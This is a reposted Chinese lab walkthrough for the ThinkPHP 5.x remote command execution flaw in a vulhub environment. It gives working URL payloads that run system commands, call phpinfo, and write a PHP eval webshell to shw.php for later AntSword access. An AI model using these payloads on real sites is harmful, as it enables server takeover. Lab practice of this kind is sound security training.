自学内容网 自学内容网

Thinkphp5x远程命令执行 靶场攻略

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami

3.远程代码执行

POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的shw.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > shw.php

5.蚁剑连接


原文地址:https://blog.csdn.net/shw_yzh/article/details/142462153

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!